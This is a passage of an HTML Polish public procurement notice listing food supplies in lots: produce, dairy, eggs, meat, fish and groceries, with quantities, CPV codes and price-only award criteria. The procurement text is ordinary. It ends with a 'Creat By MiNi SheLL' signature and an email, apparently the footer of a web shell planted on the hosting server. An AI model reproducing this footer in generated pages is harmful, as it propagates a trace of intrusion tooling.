Pieczarki Kg-200,Podgrzybek suszony Kg-1,Rodzynki Kg-5,
Rzodkiewka 150g Szt-150,Rzodkiew biała Kg-53,
Szczypiorek pęczek 50g Szt-250,Seler Kg-460,Sałata masłowa szt-120,
Sałata lodowa szt-320,Śliwki(sezon) kg-40,Truskawka (sezon) Kg-50,
Winogrona ciemne Kg-40,Winogrona jasne kg-40,Wiśnie (sezon) Kg-30,
Ziemniak młody Kg-3200,Ziemniak Irga Kg-8300,Zestaw do  kiszenia Szt-10<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03110000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Nabiał<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Napój mleczny zawierający bakterie jogurtowe Actimel lub równoważny 4x100g
op-400,Jogurt naturalny 150g Szt-1000,Jogurt naturalny 350g Szt-100,
Jogurt owocowy 150g Szt-2500,Masło extra  200g Szt-2400,
Kaszka manna z owocami 150g Szt-400,Mleko karton 2% 1l Szt-500,
Maślanka naturalna 1l Szt-250,Maślanka owocowa 1l Szt-25,
Margaryna extra z masłem 500g Delma lub równoważna szt-930,
Margaryna 500g o zawart.tł.min 39% typu Rama lub równoważna szt-1200,
Margaryna do pieczenia Kasia 250g lub równoważna szt-15,
Ser typu Feta 270g Szt-60,
Serek homogenizowany Pyszny 140 g lub równoważny  Szt-2000,
Ser żółty edamski/gouda Kg-300,
Ser pleśniowy 125g President Camembert lub równoważny Szt-50,
Ser wędzony Kg-20,Ser mascarpone 250g Szt-20,
Serek  typu wiejski ziarnisty 200g Szt-2700,
Serek 135g Twój Smak lub równoważny Szt-1100,
Śmietana 30% 500ml Szt-90,Śmietana 18% 400g Szt-1400,
Twaróg chudy kg-380,Twaróg półtłusty kg-20,
Twaróg sernikowy President lub równoważny 1kg Szt-10,
Serek topiony blok 100g Szt-200,Ser mozzarella 125g szt-210,
Serek Hochland zegarek lub równoważny 200g Szt-570<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15500000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Jaja<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Jaja kurze klasa A waga M szt-20000
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03142500-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Mięso i wędliny<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Baleron  gotowany kg-8,Boczek wp wędzony kg-130,Boczek bk surowy kg-370;
Ćwiartki kurczęce tylne schłodzone kg-550;
Filet kurczęcy schłodzony bs kg-770;
Flaki wołowe krojone mrożone 0,90 op-60,Golonka surowa tylna wp kg-110;
Gulasz angielski kg-10,Gulasz angielski 300g PEK szt-15;
Indyk faszerowany kg-13; Karkówka wp bk kg-360;
Kaszanka jęczmienna kg-140;
Kiełbasa biała parzona wp średnio rozdrobniona kg-60;
Kiełbasa biała surowa wp średnio rozdrobniona kg-20;
Kiełbasa pieprzowa -kiełbasa wieprzowa średnio rozdrobniona, wędzona, parzona kg-240;
Kiełbasa jasiuk  kiełbasa wieprzowa grubo rozdrobniona, wędzona, w której100g produktu wytworzono ze 125g mięsa wieprzowego kg-150;
Kiełbasa krakowska parzona  kiełbasa średnio rozdrobniona, parzona wędzona
kg-55;
Kiełbasa krakowska sucha  , kiełbasa wieprzowa grubo rozdrobniona, wędzona, parzona, suszona, w której na 100g wyrobu gotowego zużyto min.143g mięsa wieprzowego kg-130;
Kiełbasa madera  kiełbasa wp średnio rozdrobniona wysokowydajna, w której skład wchodzi min. 76%  mięsa wieprzowego kg-670;
Kiełbasa piwna kg-40;
Kiełbasa swojska z cielęciną -kiełbasa wieprzowa z dodatkiem cielęciny,średnio rozdrobniona, wędzona, parzona, w której100g produktu wytworzono z min.114,2g mięsa wieprzowego i min.2,3g cielęciny kg-280;
Kiełbasa szynkowa parzona Kg-40;
Kiełbasa szynkowa borowiaka- wędzonka grubo rozdrobniona, parzona z mięsa wieprzowego, w której do wyprodukowania 100g produktu użyto 106g mięsa wieprzowego kg-150;
Kiełbasa czosnkowa  kiełbasa wieprzowa, średnio rozdrobniona, wysokowydajna, wędzona, parzona, mięso wieprzowe min.74% kg-80;
Kiełbasa żywiecka parzona kg-20;Kiełbasa żywiecka sucha kg-55;
Kości wp schabowe kg-700;
Kurczak w galarecie kg-60;Kurczak świeży kg-310;
Lunchmeat kg-80;
Łopatka surowa wp bk kg-510;Metka cebulowa kg-85;
Metka tatarska 180g szt-60;Metka tatarska Kg-20;
Metka łososiowa 300g Szt-25; Mielonka śniadaniowa kg-70;
Mielonka tyrolska kg-13; Mortadela luksusowa kg-55;
Nogi wp kg-40; Ozory wp kg-40;
Parówki Berlinki  kiełbasa wieprzowa, wędzona , parzona, homogenizowana, w osłonce niejadalnej, wyprodukowana z min. 71% mięsa wieprzowego kg-300;
Parówki maślane Kg-45; Pasztet z pieca drobiowo- wp  kg-60;
Pasztet w foremce 131g mix szt-130; Pasztetowa drobiowa kg-120;
Pieczeń czosnkowa kg-8; Pieczeń litewska kg-200;
Pieczeń rzymska kg-100; Porcje rosołowe z kurczaka kg-500;
Polędwica sopocka wp, wędzona, parzona, w której skład wchodzi min. 58% mięsa wieprzowego kg-160;
Polędwica drobiowa kg-200;
Polędwica wiśniowa wp, wędzona, parzona, w której skład wchodzi min. 65% mięsa wieprzowego kg-167;
Przekładaniec grecki kg-5; Polędwica miodowa kg-35;
Polędwica z warzywami kg-110; Salami bumerang kg-50;
Salceson włoski kg-55; Salceson z ziołami Kg-10;
Salceson czosnkowy kg-67;
Schab pieczony- wędzonka wysokowydajna wieprzowa, wędzona, parzona wyprodukowana z 64% mięsa wieprzowego kg-190;
Schab wędzony kg-10; Schab surowy wp bk kg-270; 
Serca drobiowe surowe kg-40;
Skrzydła kurczęce schłodzone kg-400; Słonina wp surowa kg-40;
Smalec wp   200g szt -10;
Szynka wp surowa bk kg-500; Szynka wp gotowana kg-10;
Szynka wędzona  szynka wp wędzona, parzona, w której skład wchodzi min.70% mięsa wieprzowego kg-65;
Szynka konserwowa wp kg-150;
Szynka wędzona z liściem w której skład wchodzi min.85%szynki wieprzowej, wędzona,parzona kg-170;
Szynka bohuna wp wysokowydajna, wędzona,parzona, w której skład wchodzi min.72% mięsa wieprzowego kg-60;
Wątroba świeża drobiowa kg-70;
Wędzonka chłopska kg-15;
Udziec woowy b/k Kg-100;
Żeberka wp paski kg-350;
Żołądki drobiowe świeże kg-75;<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15100000-9, 15112000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Ryby<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Morszczuk filet - bez skóry, dopuszczalna ilość glazury nie więcej niż 15% 
Kg-550;
Płat śledziowy solony bez skory 4kg Szt-55;
Płat śledziowy  marynowany bez skory 4kg szt-5;
Makrela wędzona kg-150;
Sandacz filet - bez skóry, dopuszczalna ilość glazury nie więcej niż 20% 
kg-60;
Karp świeży Kg-60;<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15220000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>artkuły ogólnospożywcze<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Ananas plastry 565g w syropie Szt-80; Aromat do ciast 9ml Szt-10;
Bazylia suszona 10g Szt-35; Barszcz ukraiński mrożony Kg-80;
Barszcz ukraiński mrożony 450g Szt-100; Brokuł różyczki mrożony kg-120;
Brzoskwinia połówki w syropie 820g puszka szt-250;
Budyń 1 kg mix szt-20; Chrzan tarty na kwasku cytrynowym 170g szt-40;
Ciastka krakersy 100g szt-1500; Ciastka biszkopty 500g szt-50;
Ciastka biszkopty 120g Szt-250; Ciastka biszkopty z galaretką 135g szt-350;
Ciastka kruche  domowe 3kg szt-6; Ciastka kruche z marmoladą 3kg Szt-6;
Ciastka pierniki w czekoladzie 2,5kg szt-4; Cukier biały kryształ kg-1500;
Cukier puder 500g szt-10; Cukier waniliowy 32g szt-280;
Cynamon mielony 15g szt-25; Czekolada mleczna 100g szt-500;
Czekolada gorzka 90g szt-300; Czekolada biała 100g szt-20;
Czekolada mleczna 300g szt-100; Czosnek granulowany 20g szt-100;
Cząstka ziemniaka ze skórką mrożone kg-30;
Ćwikła z chrzanem 260g Szt-15;Przyprawa Degusta 5kg lub równoważna szt-25;
Dżem niskosłodzony 270g mix szt-1100; 
Dżem fruktoza 220g dla cukrzyków Szt-330; Fasola sucha biała 5kg op-16;
Fasola drobna 5kg Szt-5; Fasola konserwowa czerwona 400g szt-50;
Fasola szparagowa konserwowa zielona  470g Szt-200;
Fasola żółta  mrożona luz kg- 15; Galaretka owocowa mix 75g szt-260;
Groch suchy łuskany połówki 5kg szt-15; Groszek konserwowy 400g szt-100;
Herbata ex a 300 Saga lub równoważna szt-160;
Herbata owocowa ex a30 Saga lub równoważna szt-250;
Kakao Decomorreno 200g lub równoważne szt-30;
Kakao Puchatek 300g torebka lub równoważne Szt-200;
Kalafior mrożony kg-60; Kasza jęczmienna wiejska 1kg szt-280;
Kasza manna 1kg szt-200; Kaszka ryżowa bezmleczna 180g szt-250;
Kawa naturalna mielona bez kofeiny 250g szt-10;
Kawa naturalna mielona 250g szt-40;
Kawa rozpuszczalna 200g Szt-20; Kawa zbożowa 500g Szt-25;
Ketchup łagodny Kotlin 450g  lub równoważny, w którym do wyprodukowania 100g produktu użyto min. 160g pomidorów szt-15;
Ketchup pikantny Kotlin 450g lub równoważny,w którym do wyprodukowania 100g produktu użyto min.120g pomidorów szt-35;
Kisiel 40g mix szt-240; Kompot mix 900ml szt-720;
Koncentrat pomidorowy Knorr 800g lub równoważny szt-50;
Kukurydza konserwowa 400g szt-220; Kminek 20g Szt-25;
Kwasek cytrynowy 1kg szt-5;
Liść laurowy 1kg szt-2;
Majonez 815 g(skład:olej roślinny rzepakowy 63%,woda, musztarda,żółtka jaj 6%,cukier)Kętrzyński lub równoważny szt-120;
Majeranek 20g Szt-35; Makaron łazanki 3kg szt-5;
Makaron piórka produkowany z semoliny - mąki uzyskiwanej z pszenicy durum 3kg Szt-15;
Makaron muszelka produkowany z semoliny - mąki uzyskiwanej z pszenicy durum 1kg szt-50;
Makaron nitka produkowany z semoliny - mąki uzyskiwanej z pszenicy durum 1kg szt-30;
Makaron nitka produkowany z semoliny - mąki uzyskiwanej z pszenicy durum 3kg szt-60;
Makaron rurki- produkowany z semoliny - mąki uzyskiwanej z pszenicy durum 3kg szt-15;
Makaron świderki- produkowany z semoliny - mąki uzyskiwanej z pszenicy durum 3kg szt-20;
Makaron świderki produkowany z semoliny - mąki uzyskiwanej z pszenicy durum 1 kg Szt-250;
Mąka ziemniaczana kg-70; Mąka tortowa typ 450 kg-110;
Mąka luksusowa typ 550 kg-750;
Mieszanka warzywna mrożona 7-składnikowa Kg-400; Miód 1kg szt-60;
Marchewka z groszkiem konserwowa 460g szt-430;
Musztarda sarepska 210g szt-150; Ocet spirytusowy 10% 1l szt-70;
Ogórki konserwowe słoik 870g szt-250; 
Oregano 200g Szt-5; Olej rzepakowy 1l szt-850;
Pomidory suszone 314ml Szt-50;
Papryka czerwona słodka mielona 500g Knorr lub równoważna szt-3;
Paprykarz szczeciński 341g szt-50;
Pieprz naturalny mielony 1kg szt-2;
Pieprz ziołowy 20g szt-40;
Płatki śniadaniowe kuleczki czekoladowe 1kg szt-50;
Płatki śniadaniowe kukurydziane 500g szt-300;
Proszek do pieczenia 30g szt-160;
Przyprawa curry 25g szt-50;
Przyprawa do gyrosa 30g szt-25;
Przyprawa do drobiu 600g Knorr lub równoważna Szt-15;
Przyprawa do kurczaka 1kg Szt-6; 
Przyprawa do grilla 500g szt-2;
Przyprawa do mięsa 600g Delikat lub równoważna szt-17;
Przyprawa do flaków Appetita 25g lub równoważna szt-25;
Przyprawa do ryb 40g Szt-25;
Przyprawa do zup w płynie 1l Winiary lub równoważna szt-100;
Ryż długoziarnisty kg-400;
Soda oczyszczona 20g szt-25;
Soczki marchwiowo-owocowe 330ml Szt-1400;
Sok z buraków i jabłka 330ml Szt-100;
Sok pomidorowy 330ml Szt-800;
Sos sałatkowy 700g szt-7; Sól drobnoziarnista kg-250;
Sól ziołowa 30g szt-25; Słodzik 1200 tabletek szt-15;
Syrop owocowy 5l szt-90; Szpinak mrożony Kg-230;
Filet z makreli w pomidorach 170g szt-500;
Śmietana w proszku Śnieżka 60g lub równoważna szt-25;
Tymianek 10g szt-50;
Tuńczyk kawałki w sosie własnym 170g szt-150; Truskawki mrożone Kg-75;
Talarki ziemniaczane mrożone Kg-15; Wiórki kokosowe 200g szt-20;
Wiśnie mrożone kg-10; Wafle ryżowe naturalne 110g szt-180;
Wafle kakaowe 2,5kg szt-8; Warzywa na patelnie mrożone Kg-10;
Woda mineralna 1,5l gaz szt-300;
Zając czekoladowy 16g szt-100;Ziele angielskie 500g szt-3;
Ziele angielskie 1kg Szt-1; Żelatyna spożywcza 50g szt-25;
Żurek staropolski 500ml szt-130;
Żurawina suszona 200g Szt-15;
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6, 15980000-1,
                    15600000-4,
                    15300000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com